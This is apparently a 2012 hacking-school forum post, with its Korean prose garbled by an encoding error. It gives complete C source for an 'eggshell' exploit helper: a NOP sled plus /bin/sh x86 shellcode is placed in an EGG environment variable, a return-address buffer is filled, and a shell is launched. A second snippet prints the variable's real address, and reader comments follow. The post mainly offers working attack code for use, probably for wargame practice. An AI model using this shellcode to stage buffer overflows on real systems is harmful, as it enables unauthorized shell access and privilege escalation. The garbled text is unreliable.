1619, 1/81 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   craft
   http://leewon21wkd.blog.me/
   eggshell ¼Ò½º ¹× »ç¿ë½Ã À¯ÀÇ»çÇ×

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1939 [º¹»ç]


#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[]) {
        char *buff, *ptr, *egg;
        long *addr_ptr, addr;
        int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
        int i, eggsize=DEFAULT_EGG_SIZE;
        if (argc > 1) bsize   = atoi(argv[1]);
        if (argc > 2) offset  = atoi(argv[2]);
        if (argc > 3) eggsize = atoi(argv[3]);
        if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
        }
        if (!(egg = malloc(eggsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
        }
        addr = get_esp() - offset;
        printf("Using address: 0x%x\n", addr);
        ptr = buff;
        addr_ptr = (long *) ptr;
        for (i = 0; i < bsize; i+=4)
        {
                if(i == 1040)
                {
                        *(addr_ptr++) = 0x1234567;
                }
                else
                        *(addr_ptr++) = addr;
}
        ptr = egg;
        for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
                *(ptr++) = NOP;
        for (i = 0; i < strlen(shellcode); i++)
                *(ptr++) = shellcode[i];
        buff[bsize - 1] = '\0';
        egg[eggsize - 1] = '\0';
        memcpy(egg,"EGG=",4);
        putenv(egg);
        memcpy(buff,"RET=",4);
        putenv(buff);
        system("/bin/bash");
}

===========================================================================

ÀÌ ÇÁ·Î±×·¥À» ÄÄÆÄÀÏÇÏ°í ½ÇÇà½Ã۰í Ãâ·ÂµÈ ÁÖ¼Ò°ªÀ» »ç¿ëÇϸé Á¦´ë·Î ½ÇÇàµÇÁö ¾Ê½À´Ï´Ù.
±×·¡¼­ Àú´Â ¿¡±×½©À» °ÅÁþ¸»ÀïÀ̶ó°í ºÎ¸£ÁÒ
ÁøÂ¥ ¿¡±×½©ÀÇ ÁÖ¼Ò¸¦ ¾ò±â À§Çؼ­´Â ÄÄÆÄÀÏµÈ À§ÀÇ ¿¡±×½©À» ½ÇÇà½ÃŲ ÈÄ

#include <stdio.h>
int main()
{
        printf("Addr = %p\n", getenv("EGG"));
}

À§ÀÇ Äڵ带 ÄÄÆÄÀÏ ÇÏ½Ã°í ½ÇÇà½ÃŰ¸é ¿¡±×½©ÀÇ ÁøÂ¥ ÁÖ¼Ò°¡ Ãâ·ÂµË´Ï´Ù.

  Hit : 11915     Date : 2012/01/27 03:37



    
sohun5013 À½.. ¿ª½Ã ¿¡±×½©ÀÌ ÄÚµå ÁÖ¼Ò¸¦ °íÁ¤½ÃÄÑÁÖ´Â ¿ªÇÒÀ» ÇÏ´Â °Å±º¿ä.. 2012/01/27  
kjwon15 Àú ¹ØÀÇ ÄÚµå ÇÊ¿ä¾øÀÌ
printf '%p\n' $EGG
ÇÏ¸é µÉ°Å°°½À´Ï´Ù.
¿©±â¼­ printf´Â ÇÔ¼ö°¡ ¾Æ´Ï¶ó ¸®´ª½º ³»ºÎÀÇ ¸í·É¾îÀÔ´Ï´Ù.
2012/01/28  
craft kjwon15 // ±×·¸Äï¿ä Á¶¾ð °¨»çÇÕ´Ï´Ù!¤»¤» 2012/01/28  
sohun5013 $ printf '%p\n' $SHELLCODE
bash: printf: `p': invalid format character
¶ó°í ¶ß´Âµ¥¿ä;;
2012/01/28  
chaser1963 kjwon15´Ô
printf°¡ ¸®´ª½º ³»ºÎ¸í·É¾î¶ó°í ¸»¾¸ÇÏ½Ã´Â°Ç ½Ã½ºÅÛÄÝÀ̶ó´Â°Ç°¡¿ä ?
¶óÀ̺귯¸®·Î ¾Ë°íÀִµ¥...
2012/02/05  
BrokenPipe chaser1963//
shell ¸í·É¾î¿ä
C¾ð¾î ÇÔ¼ö¸»°í ¸®´ª½º ÇÁ·ÒÇÁÆ® »ó¿¡¼­ printf "abc" Ãĺ¸½Ã¸é
echo "abc" ¶û µ¿ÀÏÇÑ È¿°ú¸¦ ³»¿ä
2012/02/05